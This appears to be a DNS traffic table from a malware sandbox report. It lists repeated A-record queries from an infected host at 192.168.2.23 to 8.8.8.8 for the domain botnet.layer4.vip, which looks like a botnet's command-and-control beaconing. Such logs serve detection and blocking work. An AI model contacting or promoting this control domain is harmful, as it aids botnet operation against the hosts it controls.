                                  Apr 9, 2023 03:30:50.743417978 CEST192.168.2.238.8.8.80x852cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.767585039 CEST192.168.2.238.8.8.80x852cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.783339977 CEST192.168.2.238.8.8.80x1f05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.807423115 CEST192.168.2.238.8.8.80x1f05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.831710100 CEST192.168.2.238.8.8.80x1f05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.856163025 CEST192.168.2.238.8.8.80x1f05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.871668100 CEST192.168.2.238.8.8.80x1f05Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.887281895 CEST192.168.2.238.8.8.80xb4b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.903024912 CEST192.168.2.238.8.8.80xb4b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.927383900 CEST192.168.2.238.8.8.80xb4b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.942864895 CEST192.168.2.238.8.8.80xb4b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.958652020 CEST192.168.2.238.8.8.80xb4b0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:50.983256102 CEST192.168.2.238.8.8.80xace8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.007376909 CEST192.168.2.238.8.8.80xace8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.032742977 CEST192.168.2.238.8.8.80xace8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.056854010 CEST192.168.2.238.8.8.80xace8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.081013918 CEST192.168.2.238.8.8.80xace8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.105611086 CEST192.168.2.238.8.8.80x8f20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.121429920 CEST192.168.2.238.8.8.80x8f20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.145768881 CEST192.168.2.238.8.8.80x8f20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.170165062 CEST192.168.2.238.8.8.80x8f20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.194565058 CEST192.168.2.238.8.8.80x8f20Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.210500002 CEST192.168.2.238.8.8.80x47f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.226039886 CEST192.168.2.238.8.8.80x47f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.250480890 CEST192.168.2.238.8.8.80x47f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.274652958 CEST192.168.2.238.8.8.80x47f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.290132046 CEST192.168.2.238.8.8.80x47f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.314650059 CEST192.168.2.238.8.8.80x7b83Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.330878019 CEST192.168.2.238.8.8.80x7b83Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.346482038 CEST192.168.2.238.8.8.80x7b83Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.361984015 CEST192.168.2.238.8.8.80x7b83Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.386337996 CEST192.168.2.238.8.8.80x7b83Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.410804033 CEST192.168.2.238.8.8.80x1254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.435157061 CEST192.168.2.238.8.8.80x1254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.451025963 CEST192.168.2.238.8.8.80x1254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.475477934 CEST192.168.2.238.8.8.80x1254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.491408110 CEST192.168.2.238.8.8.80x1254Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.507169008 CEST192.168.2.238.8.8.80xc059Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.531708002 CEST192.168.2.238.8.8.80xc059Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.547374964 CEST192.168.2.238.8.8.80xc059Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.571670055 CEST192.168.2.238.8.8.80xc059Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.587414980 CEST192.168.2.238.8.8.80xc059Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.612242937 CEST192.168.2.238.8.8.80xc5e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.628258944 CEST192.168.2.238.8.8.80xc5e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.652407885 CEST192.168.2.238.8.8.80xc5e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.668392897 CEST192.168.2.238.8.8.80xc5e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.693135977 CEST192.168.2.238.8.8.80xc5e9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.717531919 CEST192.168.2.238.8.8.80x663aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.733551025 CEST192.168.2.238.8.8.80x663aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.749537945 CEST192.168.2.238.8.8.80x663aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.765153885 CEST192.168.2.238.8.8.80x663aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.781040907 CEST192.168.2.238.8.8.80x663aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.805741072 CEST192.168.2.238.8.8.80x2297Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.821810961 CEST192.168.2.238.8.8.80x2297Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.846457958 CEST192.168.2.238.8.8.80x2297Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.870659113 CEST192.168.2.238.8.8.80x2297Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.886471033 CEST192.168.2.238.8.8.80x2297Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.902497053 CEST192.168.2.238.8.8.80xae4dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.927129984 CEST192.168.2.238.8.8.80xae4dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.942955971 CEST192.168.2.238.8.8.80xae4dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.967180967 CEST192.168.2.238.8.8.80xae4dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:51.991396904 CEST192.168.2.238.8.8.80xae4dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.016236067 CEST192.168.2.238.8.8.80x5a53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.032582045 CEST192.168.2.238.8.8.80x5a53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.057049036 CEST192.168.2.238.8.8.80x5a53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.081198931 CEST192.168.2.238.8.8.80x5a53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.105787992 CEST192.168.2.238.8.8.80x5a53Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.121501923 CEST192.168.2.238.8.8.80xd350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.146018982 CEST192.168.2.238.8.8.80xd350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.162003040 CEST192.168.2.238.8.8.80xd350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.177720070 CEST192.168.2.238.8.8.80xd350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.201669931 CEST192.168.2.238.8.8.80xd350Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.217215061 CEST192.168.2.238.8.8.80x9aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.241166115 CEST192.168.2.238.8.8.80x9aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.256669998 CEST192.168.2.238.8.8.80x9aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.281065941 CEST192.168.2.238.8.8.80x9aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.305252075 CEST192.168.2.238.8.8.80x9aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.329462051 CEST192.168.2.238.8.8.80xd5d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.344898939 CEST192.168.2.238.8.8.80xd5d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.360620022 CEST192.168.2.238.8.8.80xd5d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.376071930 CEST192.168.2.238.8.8.80xd5d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.400430918 CEST192.168.2.238.8.8.80xd5d7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.416338921 CEST192.168.2.238.8.8.80xd12bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.440418959 CEST192.168.2.238.8.8.80xd12bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.456202030 CEST192.168.2.238.8.8.80xd12bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.480556965 CEST192.168.2.238.8.8.80xd12bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.505039930 CEST192.168.2.238.8.8.80xd12bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.520941973 CEST192.168.2.238.8.8.80xdf17Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.536449909 CEST192.168.2.238.8.8.80xdf17Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.552299023 CEST192.168.2.238.8.8.80xdf17Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.576419115 CEST192.168.2.238.8.8.80xdf17Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.600545883 CEST192.168.2.238.8.8.80xdf17Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.616491079 CEST192.168.2.238.8.8.80x5a27Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.640583038 CEST192.168.2.238.8.8.80x5a27Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.656444073 CEST192.168.2.238.8.8.80x5a27Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.680537939 CEST192.168.2.238.8.8.80x5a27Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.704101086 CEST192.168.2.238.8.8.80x5a27Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.728302956 CEST192.168.2.238.8.8.80x4107Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.744076967 CEST192.168.2.238.8.8.80x4107Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.768194914 CEST192.168.2.238.8.8.80x4107Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.783677101 CEST192.168.2.238.8.8.80x4107Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.799139023 CEST192.168.2.238.8.8.80x4107Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.823396921 CEST192.168.2.238.8.8.80xd609Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.847588062 CEST192.168.2.238.8.8.80xd609Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.871706963 CEST192.168.2.238.8.8.80xd609Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.887470961 CEST192.168.2.238.8.8.80xd609Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.903907061 CEST192.168.2.238.8.8.80xd609Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.919418097 CEST192.168.2.238.8.8.80x7c10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.944504023 CEST192.168.2.238.8.8.80x7c10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.960408926 CEST192.168.2.238.8.8.80x7c10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:52.976217985 CEST192.168.2.238.8.8.80x7c10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.000616074 CEST192.168.2.238.8.8.80x7c10Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.024988890 CEST192.168.2.238.8.8.80x4b95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.042146921 CEST192.168.2.238.8.8.80x4b95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.066478968 CEST192.168.2.238.8.8.80x4b95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.091648102 CEST192.168.2.238.8.8.80x4b95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.108064890 CEST192.168.2.238.8.8.80x4b95Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.125108957 CEST192.168.2.238.8.8.80xad8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.141928911 CEST192.168.2.238.8.8.80xad8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.167421103 CEST192.168.2.238.8.8.80xad8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.183043003 CEST192.168.2.238.8.8.80xad8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.198894978 CEST192.168.2.238.8.8.80xad8dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.214879036 CEST192.168.2.238.8.8.80xc366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.239275932 CEST192.168.2.238.8.8.80xc366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.263351917 CEST192.168.2.238.8.8.80xc366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.287468910 CEST192.168.2.238.8.8.80xc366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.311939001 CEST192.168.2.238.8.8.80xc366Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.327802896 CEST192.168.2.238.8.8.80x1062Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.343420029 CEST192.168.2.238.8.8.80x1062Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.359141111 CEST192.168.2.238.8.8.80x1062Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.383382082 CEST192.168.2.238.8.8.80x1062Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.399437904 CEST192.168.2.238.8.8.80x1062Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.424107075 CEST192.168.2.238.8.8.80x93f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.448610067 CEST192.168.2.238.8.8.80x93f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.464133978 CEST192.168.2.238.8.8.80x93f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.479851007 CEST192.168.2.238.8.8.80x93f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.504388094 CEST192.168.2.238.8.8.80x93f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.529198885 CEST192.168.2.238.8.8.80x585Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.553560019 CEST192.168.2.238.8.8.80x585Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.578146935 CEST192.168.2.238.8.8.80x585Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.602736950 CEST192.168.2.238.8.8.80x585Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.626904964 CEST192.168.2.238.8.8.80x585Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.651225090 CEST192.168.2.238.8.8.80x2db9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.666913033 CEST192.168.2.238.8.8.80x2db9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.691088915 CEST192.168.2.238.8.8.80x2db9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.715703011 CEST192.168.2.238.8.8.80x2db9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.731358051 CEST192.168.2.238.8.8.80x2db9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.747441053 CEST192.168.2.238.8.8.80x592Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.763389111 CEST192.168.2.238.8.8.80x592Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.779040098 CEST192.168.2.238.8.8.80x592Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.803179979 CEST192.168.2.238.8.8.80x592Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.827361107 CEST192.168.2.238.8.8.80x592Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.843403101 CEST192.168.2.238.8.8.80xeeacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.859503031 CEST192.168.2.238.8.8.80xeeacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.875159025 CEST192.168.2.238.8.8.80xeeacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.899694920 CEST192.168.2.238.8.8.80xeeacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.923866034 CEST192.168.2.238.8.8.80xeeacStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.948590040 CEST192.168.2.238.8.8.80xb5c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.973115921 CEST192.168.2.238.8.8.80xb5c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:53.997589111 CEST192.168.2.238.8.8.80xb5c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.013284922 CEST192.168.2.238.8.8.80xb5c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.028951883 CEST192.168.2.238.8.8.80xb5c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.045097113 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.061175108 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.077166080 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.102286100 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.126712084 CEST192.168.2.238.8.8.80xa50fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.151418924 CEST192.168.2.238.8.8.80x6f3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.176048994 CEST192.168.2.238.8.8.80x6f3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.192387104 CEST192.168.2.238.8.8.80x6f3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.217638969 CEST192.168.2.238.8.8.80x6f3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.234180927 CEST192.168.2.238.8.8.80x6f3fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.258703947 CEST192.168.2.238.8.8.80x635bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.283143044 CEST192.168.2.238.8.8.80x635bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.298666000 CEST192.168.2.238.8.8.80x635bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.323263884 CEST192.168.2.238.8.8.80x635bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.348776102 CEST192.168.2.238.8.8.80x635bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.373219967 CEST192.168.2.238.8.8.80x45f6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.389283895 CEST192.168.2.238.8.8.80x45f6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.413790941 CEST192.168.2.238.8.8.80x45f6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.438198090 CEST192.168.2.238.8.8.80x45f6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.463040113 CEST192.168.2.238.8.8.80x45f6Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.479063988 CEST192.168.2.238.8.8.80x1effStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.503374100 CEST192.168.2.238.8.8.80x1effStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.528616905 CEST192.168.2.238.8.8.80x1effStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.544976950 CEST192.168.2.238.8.8.80x1effStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.561188936 CEST192.168.2.238.8.8.80x1effStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.586419106 CEST192.168.2.238.8.8.80x27eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.602751970 CEST192.168.2.238.8.8.80x27eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.618998051 CEST192.168.2.238.8.8.80x27eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.635020971 CEST192.168.2.238.8.8.80x27eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.650749922 CEST192.168.2.238.8.8.80x27eaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.676156998 CEST192.168.2.238.8.8.80xe2acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.693392992 CEST192.168.2.238.8.8.80xe2acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.717886925 CEST192.168.2.238.8.8.80xe2acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.743060112 CEST192.168.2.238.8.8.80xe2acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.768327951 CEST192.168.2.238.8.8.80xe2acStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:54.792536020 CEST192.168.2.238.8.8.80x7753Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
